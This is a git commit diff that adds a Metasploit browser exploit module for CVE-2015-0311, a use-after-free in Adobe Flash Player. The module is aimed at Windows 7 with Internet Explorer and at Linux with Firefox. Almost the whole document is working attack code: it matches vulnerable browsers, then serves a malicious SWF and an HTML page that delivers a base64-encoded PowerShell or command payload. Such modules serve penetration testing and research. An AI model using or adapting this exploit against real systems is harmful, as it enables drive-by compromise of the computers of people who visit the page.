Add the multiplatform exploit

jvazquez-r7 · jvazquez-r7 · commit aa919da84dbe · 2015-05-20T18:57:59.000-05:00
diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'                => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',
+      'Description'         => %q{
+        This module exploits an use after free vulnerability in Adobe Flash Player. The
+        vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying
+        to uncompress() a malformed byte stream. This module has been tested successfully
+        on:
+        * Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.
+        * Linux Mint "Rebecca" (32 bits) with Firefox 33.0 and Flash 11.2.202.404.
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              =>
+        [
+          'Unknown', # Vulnerability discovery and exploit in the wild
+          'hdarwin', # Public exploit by @hdarwin89
+          'juan vazquez' # msf module
+        ],
+      'References'          =>
+        [
+          ['CVE', '2015-0311'],
+          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],
+          ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],
+          ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']
+        ],
+      'Payload'             =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'            => ['win', 'unix'],
+      'Arch'                => [ARCH_X86, ARCH_CMD],
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :os_name => lambda do |os|
+              os =~ OperatingSystems::Match::LINUX ||
+              os =~ OperatingSystems::Match::WINDOWS_7
+            end,
+          :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
+          :flash   => lambda do |ver|
+              (ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')) ||
+                (ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438'))
+            end,
+          :arch    => ARCH_X86
+        },
+      'Targets'             =>
+        [
+          [ 'Windows',
+            {
+              'Platform' => 'win',
+              'Arch'     => ARCH_X86
+            }
+          ],
+          [ 'Linux',
+            {
+              'Platform' => 'unix',
+              'Arch'     => ARCH_CMD
+            }
+          ]
+        ],
+      'Privileged'          => false,
+      'DisclosureDate'      => 'Apr 28 2014',
+      'DefaultTarget'       => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+
+    super
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status('Sending SWF...')
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status('Sending HTML...')
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+
+    if target.name =~ /Windows/
+      psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
+      b64_payload = Rex::Text.encode_base64(psh_payload)
+      platform_id = 'win'
+    elsif target.name =~ /Linux/
+      b64_payload = Rex::Text.encode_base64(target_payload)
+      platform_id = 'linux'
+    end
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
+    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+
+end
